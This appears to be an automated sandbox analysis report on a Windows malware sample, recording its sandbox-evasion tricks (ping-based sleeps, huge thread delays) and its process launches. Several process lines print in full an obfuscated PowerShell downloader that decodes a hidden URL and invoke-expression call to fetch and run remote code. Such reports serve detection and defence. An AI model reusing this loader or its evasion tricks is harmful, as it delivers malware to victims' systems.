          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Uses ping.exe to sleep
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 1
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5192Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4715Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6942Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2723Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7884Thread sleep time: -3689348814741908s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8032Thread sleep count: 6942 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8020Thread sleep count: 2723 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8064Thread sleep time: -5534023222112862s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\cmd.exeFile Volume queried: C:\Windows\System32 FullSizeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: powershell.exe, 00000007.00000002.4220569806.00000244A2622000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 1Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping %.%.%.%Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dirJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Srbrns = 1;$Headling='Substrin';$Headling+='g';Function Fremtidsmuligheders($Elmiernflatable){$Uddannelsesafdelingerne=$Elmiernflatable.Length-$Srbrns;For($Elmier=5; $Elmier -lt $Uddannelsesafdelingerne; $Elmier+=(6)){$Undepreciative+=$Elmiernflatable.$Headling.Invoke($Elmier, $Srbrns);}$Undepreciative;}function Udslyngende($barm){& ($deforming) ($barm);}$Paviour=Fremtidsmuligheders ' ThemMBentjoTumulz couninonbilSo erl KonnaHelss/ Mus.5Maegl.Journ0Enlac Ci r(vesp,W MoriiPhthon AnoddKejs,oanal wDawttsEnkel EmascNSe,icT Reof Optim1Kanal0Nac o.Eviln0 Cohe;Biote restWAn,stiBagtandigam6 nse4Teleo;Exist Labox f,sk6 mas,4ukoll;Sinus Cinqur ,ntrvPtafi:Insta1H log2 Fals1 Dehu.D nsk0Photo)Konfo S,igmG KlbbeMiljicHjr,mkVievaomacro/.ring2 Rute0Tyngd1Iagtt0Twirl0Afste1Storm0Termo1Hors. SnrehFNucleiPopparYe,hoewifehfTaranoC.araxThy s/ar en1Abave2 orsi1Ikono.Dotti0Wordi ';$Presserendes=Fremtidsmuligheders ',pittUPrcissTimiaeCharmrSau.e- UtakAp ocrgItureealbifnCon,it avyt ';$Hustankes=Fremtidsmuligheders ' TephhRund tFootbtLim,sp Glyp:Respe/Regie/NegatoA.stir.ameliScurvgsammeiUngrinCheeraS,ruplFejlhcProlooDgnaanOsmogc riveFil,hpPe att Nyh,skonsoiT,iumnSuniocSmu t.Cerv.r nsinulo.us.CompucBacksoKogejmH.sge/ uswiaopsens .rked.ompltSpi e/ProjeKLevera DagsrSkraadCombiiImagon TritaBarsel SubgiForbitflocceFor.rtNeedee domiradver.OpsnupDebugfSkabeb saer ';$Agricolous=Fremtidsmuligheders '.onke>Sorts ';$deforming=Fremtidsmuligheders ',mpudiRevereGobsmxabbre ';$Befrogged = Fremtidsmuligheders 'Bas.geEtiolc PlanhParaloOlier flapp%Solsya.torip Catep D,owdSubc aBgerbtStrenaIng.n%Skiin\AsparBLikvieNebran Sta,zSengei AnthdTvangi.skarnT.lgaeSpids2Stro 3 econ3Ski d. GrosSCamoujC,terlProra Smok&Curta&Dipsa Afsjle Af uc ntomh kraoSalam Dephl$Frugt ';Udslyngende (Fremtidsmuligheders 'Panto$treergModiflCel,sokermab Kar a Bolil issa: kvalMFilmfa.niveu ilmer H,meeAric rAde onKodake Un,e= Folk(KraftcGilbemPerpedMadre lifto/ Mo ocPatho Kalkv$No,psBhappeeKanaefHalobr fnugoUnriggKlassgUn.areBygnid Fleu) Re i ');Udslyngende (Fremtidsmuligheders 'f.aar$ akshgEctoglRavinoOpr,jbangusaDe orlMaler:A mrkC.ltrahDrawaaDatelrM.rblmCo.che AarsuGrayfsNsk,beBeds rneighnNeuroe ApossIndda=U.kla$FredsHThumbuBombesPyromt P,rtaSprinnJounckBedeaeTilsysPalin.Dagmas.enoppHippalgr seiBefritJernb(Op,as$Sk,inACara.gDun erK,eolis ocucChiroo VililB.itooPi,peuOcells.ntar) Bu.c ');$Hustankes=$Charmeusernes[0];Udslyngende (Fremtidsmuligheders 'Scrof$UtopigNephrl Tan,oV.ndfb ,pomaBeakel.upli:TudbrR SelvoPyntetOverca NondtGuariiForsko Ann,n Da nsAll vp By nuBeatmmwholep B ggeZost,r.muldnDubioeContisLigul1Elect0Sto.e1 Jumi=Bar.kNBestoeSkinkw,aabe-Up.elOSkrmab Rij,j Intee PollcSpatut Cobw explaSPowdeyPres,sExcitt RosaeFo esmAllor.AfbinNScraneSpec.t Faun.AntipWKemikeBekl.bKyndeCem,lslMal xiMensteUndown S.rntM,tab ');Udslyngende (Fremtidsmuligheders ' asm$PeaseRCham oColoutDialeaViewitOJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Benzidine233.Sjl && echo $"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Srbrns = 1;$Headling='Substrin';$Headling+='g';Function Fremtidsmuligheders($Elmiernflatable){$Uddannelsesafdelingerne=$Elmiernflatable.Length-$Srbrns;For($Elmier=5; $Elmier -lt $Uddannelsesafdelingerne; $Elmier+=(6)){$Undepreciative+=$Elmiernflatable.$Headling.Invoke($Elmier, $Srbrns);}$Undepreciative;}function Udslyngende($barm){& ($deforming) ($barm);}$Paviour=Fremtidsmuligheders ' ThemMBentjoTumulz couninonbilSo erl KonnaHelss/ Mus.5Maegl.Journ0Enlac Ci r(vesp,W MoriiPhthon AnoddKejs,oanal wDawttsEnkel EmascNSe,icT Reof Optim1Kanal0Nac o.Eviln0 Cohe;Biote restWAn,stiBagtandigam6 nse4Teleo;Exist Labox f,sk6 mas,4ukoll;Sinus Cinqur ,ntrvPtafi:Insta1H log2 Fals1 Dehu.D nsk0Photo)Konfo S,igmG KlbbeMiljicHjr,mkVievaomacro/.ring2 Rute0Tyngd1Iagtt0Twirl0Afste1Storm0Termo1Hors. SnrehFNucleiPopparYe,hoewifehfTaranoC.araxThy s/ar en1Abave2 orsi1Ikono.Dotti0Wordi ';$Presserendes=Fremtidsmuligheders ',pittUPrcissTimiaeCharmrSau.e- UtakAp ocrgItureealbifnCon,it avyt ';$Hustankes=Fremtidsmuligheders ' TephhRund tFootbtLim,sp Glyp:Respe/Regie/NegatoA.stir.ameliScurvgsammeiUngrinCheeraS,ruplFejlhcProlooDgnaanOsmogc riveFil,hpPe att Nyh,skonsoiT,iumnSuniocSmu t.Cerv.r nsinulo.us.CompucBacksoKogejmH.sge/ uswiaopsens .rked.ompltSpi e/ProjeKLevera DagsrSkraadCombiiImagon TritaBarsel SubgiForbitflocceFor.rtNeedee domiradver.OpsnupDebugfSkabeb saer ';$Agricolous=Fremtidsmuligheders '.onke>Sorts ';$deforming=Fremtidsmuligheders ',mpudiRevereGobsmxabbre ';$Befrogged = Fremtidsmuligheders 'Bas.geEtiolc PlanhParaloOlier flapp%Solsya.torip Catep D,owdSubc aBgerbtStrenaIng.n%Skiin\AsparBLikvieNebran Sta,zSengei AnthdTvangi.skarnT.lgaeSpids2Stro 3 econ3Ski d. GrosSCamoujC,terlProra Smok&Curta&Dipsa Afsjle Af uc ntomh kraoSalam Dephl$Frugt ';Udslyngende (Fremtidsmuligheders 'Panto$treergModiflCel,sokermab Kar a Bolil issa: kvalMFilmfa.niveu ilmer H,meeAric rAde onKodake Un,e= Folk(KraftcGilbemPerpedMadre lifto/ Mo ocPatho Kalkv$No,psBhappeeKanaefHalobr fnugoUnriggKlassgUn.areBygnid Fleu) Re i ');Udslyngende (Fremtidsmuligheders 'f.aar$ akshgEctoglRavinoOpr,jbangusaDe orlMaler:A mrkC.ltrahDrawaaDatelrM.rblmCo.che AarsuGrayfsNsk,beBeds rneighnNeuroe ApossIndda=U.kla$FredsHThumbuBombesPyromt P,rtaSprinnJounckBedeaeTilsysPalin.Dagmas.enoppHippalgr seiBefritJernb(Op,as$Sk,inACara.gDun erK,eolis ocucChiroo VililB.itooPi,peuOcells.ntar) Bu.c ');$Hustankes=$Charmeusernes[0];Udslyngende (Fremtidsmuligheders 'Scrof$UtopigNephrl Tan,oV.ndfb ,pomaBeakel.upli:TudbrR SelvoPyntetOverca NondtGuariiForsko Ann,n Da nsAll vp By nuBeatmmwholep B ggeZost,r.muldnDubioeContisLigul1Elect0Sto.e1 Jumi=Bar.kNBestoeSkinkw,aabe-Up.elOSkrmab Rij,j Intee PollcSpatut Cobw explaSPowdeyPres,sExcitt RosaeFo esmAllor.AfbinNScraneSpec.t Faun.AntipWKemikeBekl.bKyndeCem,lslMal xiMensteUndown S.rntM,tab ');Udslyngende (Fremtidsmuligheders ' asm$PeaseRCham oColoutDialeaViewitOJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Benzidine233.Sjl && echo $"Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$srbrns = 1;$headling='substrin';$headling+='g';function fremtidsmuligheders($elmiernflatable){$uddannelsesafdelingerne=$elmiernflatable.length-$srbrns;for($elmier=5; $elmier -lt $uddannelsesafdelingerne; $elmier+=(6)){$undepreciative+=$elmiernflatable.$headling.invoke($elmier, $srbrns);}$undepreciative;}function udslyngende($barm){& ($deforming) ($barm);}$paviour=fremtidsmuligheders ' themmbentjotumulz couninonbilso erl konnahelss/ mus.5maegl.journ0enlac ci r(vesp,w moriiphthon anoddkejs,oanal wdawttsenkel emascnse,ict reof optim1kanal0nac o.eviln0 cohe;biote restwan,stibagtandigam6 nse4teleo;exist labox f,sk6 mas,4ukoll;sinus cinqur ,ntrvptafi:insta1h log2 fals1 dehu.d nsk0photo)konfo s,igmg klbbemiljichjr,mkvievaomacro/.ring2 rute0tyngd1iagtt0twirl0afste1storm0termo1hors. snrehfnucleipopparye,hoewifehftaranoc.araxthy s/ar en1abave2 orsi1ikono.dotti0wordi ';$presserendes=fremtidsmuligheders ',pittuprcisstimiaecharmrsau.e- utakap ocrgitureealbifncon,it avyt ';$hustankes=fremtidsmuligheders ' tephhrund tfootbtlim,sp glyp:respe/regie/negatoa.stir.ameliscurvgsammeiungrincheeras,ruplfejlhcproloodgnaanosmogc rivefil,hppe att nyh,skonsoit,iumnsuniocsmu t.cerv.r nsinulo.us.compucbacksokogejmh.sge/ uswiaopsens .rked.ompltspi e/projeklevera dagsrskraadcombiiimagon tritabarsel subgiforbitfloccefor.rtneedee domiradver.opsnupdebugfskabeb saer ';$agricolous=fremtidsmuligheders '.onke>sorts ';$deforming=fremtidsmuligheders ',mpudireveregobsmxabbre ';$befrogged = fremtidsmuligheders 'bas.geetiolc planhparaloolier flapp%solsya.torip catep d,owdsubc abgerbtstrenaing.n%skiin\asparblikvienebran sta,zsengei anthdtvangi.skarnt.lgaespids2stro 3 econ3ski d. grosscamoujc,terlprora smok&curta&dipsa afsjle af uc ntomh kraosalam dephl$frugt ';udslyngende (fremtidsmuligheders 'panto$treergmodiflcel,sokermab kar a bolil issa: kvalmfilmfa.niveu ilmer h,meearic rade onkodake un,e= folk(kraftcgilbemperpedmadre lifto/ mo ocpatho kalkv$no,psbhappeekanaefhalobr fnugounriggklassgun.arebygnid fleu) re i ');udslyngende (fremtidsmuligheders 'f.aar$ akshgectoglravinoopr,jbangusade orlmaler:a mrkc.ltrahdrawaadatelrm.rblmco.che aarsugrayfsnsk,bebeds rneighnneuroe apossindda=u.kla$fredshthumbubombespyromt p,rtasprinnjounckbedeaetilsyspalin.dagmas.enopphippalgr seibefritjernb(op,as$sk,inacara.gdun erk,eolis ocucchiroo vililb.itoopi,peuocells.ntar) bu.c ');$hustankes=$charmeusernes[0];udslyngende (fremtidsmuligheders 'scrof$utopignephrl tan,ov.ndfb ,pomabeakel.upli:tudbrr selvopyntetoverca nondtguariiforsko ann,n da nsall vp by nubeatmmwholep b ggezost,r.muldndubioecontisligul1elect0sto.e1 jumi=bar.knbestoeskinkw,aabe-up.eloskrmab rij,j intee pollcspatut cobw explaspowdeypres,sexcitt rosaefo esmallor.afbinnscranespec.t faun.antipwkemikebekl.bkyndecem,lslmal ximensteundown s.rntm,tab ');udslyngende (fremtidsmuligheders ' asm$peasercham ocoloutdialeaviewito
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$srbrns = 1;$headling='substrin';$headling+='g';function fremtidsmuligheders($elmiernflatable){$uddannelsesafdelingerne=$elmiernflatable.length-$srbrns;for($elmier=5; $elmier -lt $uddannelsesafdelingerne; $elmier+=(6)){$undepreciative+=$elmiernflatable.$headling.invoke($elmier, $srbrns);}$undepreciative;}function udslyngende($barm){& ($deforming) ($barm);}$paviour=fremtidsmuligheders ' themmbentjotumulz couninonbilso erl konnahelss/ mus.5maegl.journ0enlac ci r(vesp,w moriiphthon anoddkejs,oanal wdawttsenkel emascnse,ict reof optim1kanal0nac o.eviln0 cohe;biote restwan,stibagtandigam6 nse4teleo;exist labox f,sk6 mas,4ukoll;sinus cinqur ,ntrvptafi:insta1h log2 fals1 dehu.d nsk0photo)konfo s,igmg klbbemiljichjr,mkvievaomacro/.ring2 rute0tyngd1iagtt0twirl0afste1storm0termo1hors. snrehfnucleipopparye,hoewifehftaranoc.araxthy s/ar en1abave2 orsi1ikono.dotti0wordi ';$presserendes=fremtidsmuligheders ',pittuprcisstimiaecharmrsau.e- utakap ocrgitureealbifncon,it avyt ';$hustankes=fremtidsmuligheders ' tephhrund tfootbtlim,sp glyp:respe/regie/negatoa.stir.ameliscurvgsammeiungrincheeras,ruplfejlhcproloodgnaanosmogc rivefil,hppe att nyh,skonsoit,iumnsuniocsmu t.cerv.r nsinulo.us.compucbacksokogejmh.sge/ uswiaopsens .rked.ompltspi e/projeklevera dagsrskraadcombiiimagon tritabarsel subgiforbitfloccefor.rtneedee domiradver.opsnupdebugfskabeb saer ';$agricolous=fremtidsmuligheders '.onke>sorts ';$deforming=fremtidsmuligheders ',mpudireveregobsmxabbre ';$befrogged = fremtidsmuligheders 'bas.geetiolc planhparaloolier flapp%solsya.torip catep d,owdsubc abgerbtstrenaing.n%skiin\asparblikvienebran sta,zsengei anthdtvangi.skarnt.lgaespids2stro 3 econ3ski d. grosscamoujc,terlprora smok&curta&dipsa afsjle af uc ntomh kraosalam dephl$frugt ';udslyngende (fremtidsmuligheders 'panto$treergmodiflcel,sokermab kar a bolil issa: kvalmfilmfa.niveu ilmer h,meearic rade onkodake un,e= folk(kraftcgilbemperpedmadre lifto/ mo ocpatho kalkv$no,psbhappeekanaefhalobr fnugounriggklassgun.arebygnid fleu) re i ');udslyngende (fremtidsmuligheders 'f.aar$ akshgectoglravinoopr,jbangusade orlmaler:a mrkc.ltrahdrawaadatelrm.rblmco.che aarsugrayfsnsk,bebeds rneighnneuroe apossindda=u.kla$fredshthumbubombespyromt p,rtasprinnjounckbedeaetilsyspalin.dagmas.enopphippalgr seibefritjernb(op,as$sk,inacara.gdun erk,eolis ocucchiroo vililb.itoopi,peuocells.ntar) bu.c ');$hustankes=$charmeusernes[0];udslyngende (fremtidsmuligheders 'scrof$utopignephrl tan,ov.ndfb ,pomabeakel.upli:tudbrr selvopyntetoverca nondtguariiforsko ann,n da nsall vp by nubeatmmwholep b ggezost,r.muldndubioecontisligul1elect0sto.e1 jumi=bar.knbestoeskinkw,aabe-up.eloskrmab rij,j intee pollcspatut cobw explaspowdeypres,sexcitt rosaefo esmallor.afbinnscranespec.t faun.antipwkemikebekl.bkyndecem,lslmal ximensteundown s.rntm,tab ');udslyngende (fremtidsmuligheders ' asm$peasercham ocoloutdialeaviewito
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$srbrns = 1;$headling='substrin';$headling+='g';function fremtidsmuligheders($elmiernflatable){$uddannelsesafdelingerne=$elmiernflatable.length-$srbrns;for($elmier=5; $elmier -lt $uddannelsesafdelingerne; $elmier+=(6)){$undepreciative+=$elmiernflatable.$headling.invoke($elmier, $srbrns);}$undepreciative;}function udslyngende($barm){& ($deforming) ($barm);}$paviour=fremtidsmuligheders ' themmbentjotumulz couninonbilso erl konnahelss/ mus.5maegl.journ0enlac ci r(vesp,w moriiphthon anoddkejs,oanal wdawttsenkel emascnse,ict reof optim1kanal0nac o.eviln0 cohe;biote restwan,stibagtandigam6 nse4teleo;exist labox f,sk6 mas,4ukoll;sinus cinqur ,ntrvptafi:insta1h log2 fals1 dehu.d nsk0photo)konfo s,igmg klbbemiljichjr,mkvievaomacro/.ring2 rute0tyngd1iagtt0twirl0afste1storm0termo1hors. snrehfnucleipopparye,hoewifehftaranoc.araxthy s/ar en1abave2 orsi1ikono.dotti0wordi ';$presserendes=fremtidsmuligheders ',pittuprcisstimiaecharmrsau.e- utakap ocrgitureealbifncon,it avyt ';$hustankes=fremtidsmuligheders ' tephhrund tfootbtlim,sp glyp:respe/regie/negatoa.stir.ameliscurvgsammeiungrincheeras,ruplfejlhcproloodgnaanosmogc rivefil,hppe att nyh,skonsoit,iumnsuniocsmu t.cerv.r nsinulo.us.compucbacksokogejmh.sge/ uswiaopsens .rked.ompltspi e/projeklevera dagsrskraadcombiiimagon tritabarsel subgiforbitfloccefor.rtneedee domiradver.opsnupdebugfskabeb saer ';$agricolous=fremtidsmuligheders '.onke>sorts ';$deforming=fremtidsmuligheders ',mpudireveregobsmxabbre ';$befrogged = fremtidsmuligheders 'bas.geetiolc planhparaloolier flapp%solsya.torip catep d,owdsubc abgerbtstrenaing.n%skiin\asparblikvienebran sta,zsengei anthdtvangi.skarnt.lgaespids2stro 3 econ3ski d. grosscamoujc,terlprora smok&curta&dipsa afsjle af uc ntomh kraosalam dephl$frugt ';udslyngende (fremtidsmuligheders 'panto$treergmodiflcel,sokermab kar a bolil issa: kvalmfilmfa.niveu ilmer h,meearic rade onkodake un,e= folk(kraftcgilbemperpedmadre lifto/ mo ocpatho kalkv$no,psbhappeekanaefhalobr fnugounriggklassgun.arebygnid fleu) re i ');udslyngende (fremtidsmuligheders 'f.aar$ akshgectoglravinoopr,jbangusade orlmaler:a mrkc.ltrahdrawaadatelrm.rblmco.che aarsugrayfsnsk,bebeds rneighnneuroe apossindda=u.kla$fredshthumbubombespyromt p,rtasprinnjounckbedeaetilsyspalin.dagmas.enopphippalgr seibefritjernb(op,as$sk,inacara.gdun erk,eolis ocucchiroo vililb.itoopi,peuocells.ntar) bu.c ');$hustankes=$charmeusernes[0];udslyngende (fremtidsmuligheders 'scrof$utopignephrl tan,ov.ndfb ,pomabeakel.upli:tudbrr selvopyntetoverca nondtguariiforsko ann,n da nsall vp by nubeatmmwholep b ggezost,r.muldndubioecontisligul1elect0sto.e1 jumi=bar.knbestoeskinkw,aabe-up.eloskrmab rij,j intee pollcspatut cobw explaspowdeypres,sexcitt rosaefo esmallor.afbinnscranespec.t faun.antipwkemikebekl.bkyndecem,lslmal ximensteundown s.rntm,tab ');udslyngende (fremtidsmuligheders ' asm$peasercham ocoloutdialeaviewitoJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$srbrns = 1;$headling='substrin';$headling+='g';function fremtidsmuligheders($elmiernflatable){$uddannelsesafdelingerne=$elmiernflatable.length-$srbrns;for($elmier=5; $elmier -lt $uddannelsesafdelingerne; $elmier+=(6)){$undepreciative+=$elmiernflatable.$headling.invoke($elmier, $srbrns);}$undepreciative;}function udslyngende($barm){& ($deforming) ($barm);}$paviour=fremtidsmuligheders ' themmbentjotumulz couninonbilso erl konnahelss/ mus.5maegl.journ0enlac ci r(vesp,w moriiphthon anoddkejs,oanal wdawttsenkel emascnse,ict reof optim1kanal0nac o.eviln0 cohe;biote restwan,stibagtandigam6 nse4teleo;exist labox f,sk6 mas,4ukoll;sinus cinqur ,ntrvptafi:insta1h log2 fals1 dehu.d nsk0photo)konfo s,igmg klbbemiljichjr,mkvievaomacro/.ring2 rute0tyngd1iagtt0twirl0afste1storm0termo1hors. snrehfnucleipopparye,hoewifehftaranoc.araxthy s/ar en1abave2 orsi1ikono.dotti0wordi ';$presserendes=fremtidsmuligheders ',pittuprcisstimiaecharmrsau.e- utakap ocrgitureealbifncon,it avyt ';$hustankes=fremtidsmuligheders ' tephhrund tfootbtlim,sp glyp:respe/regie/negatoa.stir.ameliscurvgsammeiungrincheeras,ruplfejlhcproloodgnaanosmogc rivefil,hppe att nyh,skonsoit,iumnsuniocsmu t.cerv.r nsinulo.us.compucbacksokogejmh.sge/ uswiaopsens .rked.ompltspi e/projeklevera dagsrskraadcombiiimagon tritabarsel subgiforbitfloccefor.rtneedee domiradver.opsnupdebugfskabeb saer ';$agricolous=fremtidsmuligheders '.onke>sorts ';$deforming=fremtidsmuligheders ',mpudireveregobsmxabbre ';$befrogged = fremtidsmuligheders 'bas.geetiolc planhparaloolier flapp%solsya.torip catep d,owdsubc abgerbtstrenaing.n%skiin\asparblikvienebran sta,zsengei anthdtvangi.skarnt.lgaespids2stro 3 econ3ski d. grosscamoujc,terlprora smok&curta&dipsa afsjle af uc ntomh kraosalam dephl$frugt ';udslyngende (fremtidsmuligheders 'panto$treergmodiflcel,sokermab kar a bolil issa: kvalmfilmfa.niveu ilmer h,meearic rade onkodake un,e= folk(kraftcgilbemperpedmadre lifto/ mo ocpatho kalkv$no,psbhappeekanaefhalobr fnugounriggklassgun.arebygnid fleu) re i ');udslyngende (fremtidsmuligheders 'f.aar$ akshgectoglravinoopr,jbangusade orlmaler:a mrkc.ltrahdrawaadatelrm.rblmco.che aarsugrayfsnsk,bebeds rneighnneuroe apossindda=u.kla$fredshthumbubombespyromt p,rtasprinnjounckbedeaetilsyspalin.dagmas.enopphippalgr seibefritjernb(op,as$sk,inacara.gdun erk,eolis ocucchiroo vililb.itoopi,peuocells.ntar) bu.c ');$hustankes=$charmeusernes[0];udslyngende (fremtidsmuligheders 'scrof$utopignephrl tan,ov.ndfb ,pomabeakel.upli:tudbrr selvopyntetoverca nondtguariiforsko ann,n da nsall vp by nubeatmmwholep b ggezost,r.muldndubioecontisligul1elect0sto.e1 jumi=bar.knbestoeskinkw,aabe-up.eloskrmab rij,j intee pollcspatut cobw explaspowdeypres,sexcitt rosaefo esmallor.afbinnscranespec.t faun.antipwkemikebekl.bkyndecem,lslmal ximensteundown s.rntm,tab ');udslyngende (fremtidsmuligheders ' asm$peasercham ocoloutdialeaviewitoJump to behavior
          Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
